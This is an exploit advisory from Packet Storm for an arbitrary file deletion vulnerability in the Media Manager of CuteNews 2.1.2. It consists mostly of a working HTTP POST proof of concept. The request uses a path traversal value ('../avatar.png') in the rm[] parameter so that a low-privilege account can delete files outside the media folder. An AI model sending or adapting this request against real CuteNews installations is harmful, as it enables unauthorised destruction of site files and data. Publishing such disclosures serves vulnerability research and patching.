CuteNews 2.1.2 Arbitrary File Deletion

2020-05-11T00:00:00
ID PACKETSTORM:157631
Type packetstorm
Reporter Besim Altinok
Modified 2020-05-11T00:00:00

Description

                                        
                                            `# Exploit Title: CuteNews 2.1.2 - Arbitrary File Deletion  
# Date: 2020-05-08  
# Author: Besim ALTINOK  
# Vendor Homepage: https://cutephp.com  
# Software Link: https://cutephp.com/click.php?cutenews_latest  
# Version: v2.1.2 (Maybe it affect other versions)  
# Tested on: Xampp  
# Credit: İsmail BOZKURT  
# Remotely: Yes  
  
Description:  
------------------------------------------------------------------------  
In the "Media Manager" area, users can do arbitrarily file deletion.  
Because the developer did not use the unlink() function as secure. So, can  
be triggered this vulnerability by a low user account  
  
  
Arbitrary File Deletion PoC  
--------------------------------------------------------------------------------  
  
POST /cute/index.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 **********************************  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 222  
Origin: http://localhost  
DNT: 1  
Connection: close  
Referer: http://localhost/cute/index.php  
Cookie: CUTENEWS_SESSION=3f6a6ea7089e3a6a04b396d382308022  
Upgrade-Insecure-Requests: 1  
  
mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=27966e9129793e80a70089ee1c3ebfd5-tester&__signature_dsi=0ad6659c2aa31871b0b44617cf0b1200&rm%5B%5D=../avatar.png&do_action=delete  
`